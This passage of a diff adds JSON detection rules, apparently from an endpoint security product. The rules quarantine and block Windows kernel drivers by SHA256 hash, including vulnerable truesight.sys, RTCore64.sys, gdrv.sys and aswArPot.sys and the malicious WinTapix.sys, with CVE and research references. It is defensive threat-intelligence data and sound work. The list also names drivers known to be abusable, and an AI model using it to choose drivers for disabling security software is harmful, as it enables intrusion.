truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a7bbf863-9e00-50d9-8f83-058aa8a3f037", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472980Z", + "creation_date": "2026-03-23T11:45:31.472983Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472991Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eae3d11d5523aa08c4c75585e30cb93a7ef78bdc11b6570045a957c601a8b680", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a7bfcd28-0943-5fd8-8a24-9b89516f0e4e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977207Z", + "creation_date": "2026-03-23T11:45:29.977209Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977214Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d4e7335a177e47688d68ad89940c272f82728c882623f1630e7fd2e03e16f003", + "comment": "ASUS vulnerable VGA Kernel Mode Driver (aka EIO.sys) [https://www.loldrivers.io/drivers/f654ad84-c61d-477c-a0b2-d153b927dfcc/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a7efc63e-5c7d-5535-923e-7cbb7ee6a290", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488890Z", + "creation_date": "2026-03-23T11:45:31.488892Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488898Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cc9cb071af476c8e92b2e90c2bd8233d3c3254bc540ed9c275829ecc0a5e4849", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a7ff1038-d44d-5daa-a6ae-ad15a00446f7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616649Z", + "creation_date": "2026-03-23T11:45:29.616652Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616658Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "36aafa127736c7226c50061ea065f71e14f64ec60321f705bc52686d24117e0d", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a8003130-e7ba-5d23-9a7c-755655482c58", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604187Z", + "creation_date": "2026-03-23T11:45:29.604189Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604194Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fc7d726e0e803bb38c0f9e910d91970c3dd7444ace1c071381e2e06939616205", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a8018a8a-f1f4-592a-b20c-f91836c9ab99", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": 
false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622456Z", + "creation_date": "2026-03-23T11:45:29.622458Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622464Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "65025741ecd0ef516da01319b42c2d96e13cb8d78de53fb7e39cd53ea6d58c75", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a801c26e-8c79-5a67-bd06-0c92d14426eb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481262Z", + "creation_date": "2026-03-23T11:45:31.481266Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481276Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f25ae02387ffdff6c0ee34448e1919ca9ba6558babcee6074f97d7f42ffbc4f3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) 
AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a80bf6c4-a8be-55a3-a679-568cdb1be077", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829558Z", + "creation_date": "2026-03-23T11:45:31.829560Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829565Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bc05218d56b9c39b3f953e9e602542767d5edff4add56599a8a6aa2539ed8306", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a81286ee-88a6-58da-8eca-93a90f7ff296", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:30.454737Z", + "creation_date": "2026-03-23T11:45:30.454740Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454749Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "19dba69b48b085d9487cc23a4135f3ef4849c181965bffc55baed9fa6c205429", + "comment": "Vulnerable Kernel Driver (aka xjokercontroller.sys) [https://www.loldrivers.io/drivers/b3fd8560-79d3-40b7-b05f-c78044176c8c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a81c472d-5c43-5026-9bf8-defb10384178", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607240Z", + "creation_date": "2026-03-23T11:45:29.607242Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607248Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cdd2a4575a46bada4837a6153a79c14d60ee3129830717ef09e0e3efd9d00812", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"a821a2ac-790c-5311-a695-8c978683d680", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816012Z", + "creation_date": "2026-03-23T11:45:31.816015Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816023Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "813f09d9d8afd970a14e2482b7486606ac18456f89392ec054a482fb63d760c7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a821c0b5-62b8-5ca2-8dac-6092abfbac29", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.475860Z", + "creation_date": "2026-03-23T11:45:31.475864Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.475892Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ee69db23ee91aad6e57170e9ab94ba7501e3f671a099d757a0ddba01b2ccab4a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a822b18a-28ae-5ac3-ad76-430bd6340703", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149644Z", + "creation_date": "2026-03-23T11:45:31.149647Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149655Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2f8d9a34ee4fb589f38265c1bf8b672f05c8266feed1b95cea2b2312a6a32c38", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a82ebafe-232c-597f-9da3-de2b0413a57f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808723Z", + "creation_date": "2026-03-23T11:45:31.808725Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808731Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4c01bd3d635e5886b1484504e3bde5d4aa667c256b88a0be258f9abb0611fa56", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a847147f-be03-57c2-800a-08dcd9349904", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488413Z", + "creation_date": "2026-03-23T11:45:31.488415Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488421Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "01434817f4e9adf62573291ee5aa6dea65151cb79535a1c9957381f8c58c2b6c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a847b08f-bf26-519d-aa81-43526577e08d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819243Z", + "creation_date": "2026-03-23T11:45:30.819245Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819250Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6f3a182bbeba28dd15e1ad52041b8b32670651686697224cad821a334a8600da", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a8499f85-0830-5c39-88f2-c05eff9b4a17", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609003Z", + "creation_date": "2026-03-23T11:45:29.609005Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609011Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "092d04284fdeb6762e65e6ac5b813920d6c69a5e99d110769c5c1a78e11c5ba0", + "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a849d96d-9bf2-5625-9fea-185ca88de0c3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471598Z", + "creation_date": "2026-03-23T11:45:30.471601Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471610Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "20e52e0d7f579dc6884cc6e80266fddceda69ea5fdd0b095c0874b0d877e48a2", + "comment": "Vulnerable Kernel Driver (aka AsIO.sys) [https://www.loldrivers.io/drivers/bd7e78db-6fd0-4694-ac38-dbf5480b60b9/] [file 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a8539e0a-5543-5a4f-9c57-9dc6c9b9289b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968845Z", + "creation_date": "2026-03-23T11:45:29.968846Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968852Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1023dcd4c80db19e9f82f95b1c5e1ddb60db7ac034848dd5cc1c78104a6350f4", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a858dafa-b597-5722-aeef-08c21cb3b0c3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808049Z", + "creation_date": "2026-03-23T11:45:31.808051Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808060Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "68d1635780247024a4475579000212aacc64e81ed59b745cefa749df82df6a7d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a85fa80b-4f78-5ed4-be65-8226bf7b84d8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142970Z", + "creation_date": "2026-03-23T11:45:31.142971Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142977Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "99576f526ca1a82531030da2946513cba2b396310e31d4c7835725e7298ebe39", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a863fde7-b926-50a0-a120-eba8ef97a7aa", + "test_maturity_current_count": 0, + "test_maturity_delay": 
7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155924Z", + "creation_date": "2026-03-23T11:45:31.155926Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155932Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "650f32fd7b1f4af7523464937377aeaed41d72b1e6954e0036cd347d5eb8f792", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a86ccc16-085a-5dd0-9273-b94db89c65db", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455610Z", + "creation_date": "2026-03-23T11:45:30.455613Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455622Z", + "rule_level": null, + "rule_level_override": 
null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7702f240800528d8186e3e6a26e2680486fed65a6fb5a2a000ad12c1fb61a398", + "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a871665d-51ce-5073-980b-b215a3c5f70c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985685Z", + "creation_date": "2026-03-23T11:45:29.985687Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985692Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d0d8dcc01aba3ac08084ad40df3c64e7dfdd26ad403b08e610b96e2fcaf8a713", + "comment": "Malicious Kernel Driver related to WINTAPIX (aka WinTapix.sys and SRVNET2.SYS) [https://www.fortinet.com/blog/threat-research/wintapix-kernal-driver-middle-east-countries] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a87200fe-24cf-5474-9704-49f4e0480421", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
